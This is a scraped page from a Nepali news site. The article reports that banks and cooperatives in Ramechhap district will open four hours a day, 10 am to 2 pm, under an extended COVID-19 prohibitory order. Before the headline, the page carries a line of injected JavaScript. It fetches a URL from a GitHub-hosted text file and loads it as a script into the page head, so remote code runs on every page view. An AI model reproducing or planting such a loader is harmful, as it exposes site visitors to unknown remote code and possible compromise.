;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); रामेछापमा अबदेखि दैनिक ४ घण्टा बैंक खुल्ने – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • रामेछापमा अबदेखि दैनिक ४ घण्टा बैंक खुल्ने
रामेछाप बिशेष

रामेछापमा अबदेखि दैनिक ४ घण्टा बैंक खुल्ने

बैंक खुल्ने

भदौ १२,

रामेछाप । रामेछाप जिल्लामा कोरोना भाइरस संक्रमणको दर बड्दै गएकाले भोली (शनिबार) भदौ १३ गते राति १२ बजेसम्मका लागि जारि निषेधाज्ञालाई लमब्यासंगै अब जिल्लामा संचालित बैंक तथा वित्तीय संस्थाहरु दिनको ४ घण्टा खुल्ने भएका छन् ।

गत साउन ३० गते राति १२ बजेदेखि ११ गतेसम्मालाई पहिलो पटक जारि गरिएको निषेधाज्ञा थप तीन दिनका लागि दोस्रो पटक थप गरिएकोमा बिहिबार पुःन तेस्रो पटक एक साताका लागि थप गरिएको जिल्ला प्रशासन कार्यालय रामेछापले जनाएको छ । तेस्रो पटक थप गरि जिल्लामा निषेधाज्ञा १८ गते राति १२ बजेसम्मको लागि लागू गरिएको छ ।

सोही निर्णयमा प्रशासनले शुक्रबार जिल्लामा संचालित बित्तीय संस्थाहरुलाई दैनिक ४ घण्टा संचालन गर्न दिने उल्लेख गरेको छ । अब जिल्लामा संचालित सहकारी, बैंकहरु बिहान १०:०० बजेदेखि दिउँसो २ :०० बजेसम्म सञ्चालन हुने उल्लेख छ ।file Photo

फेसबुक प्रतिक्रियाहरु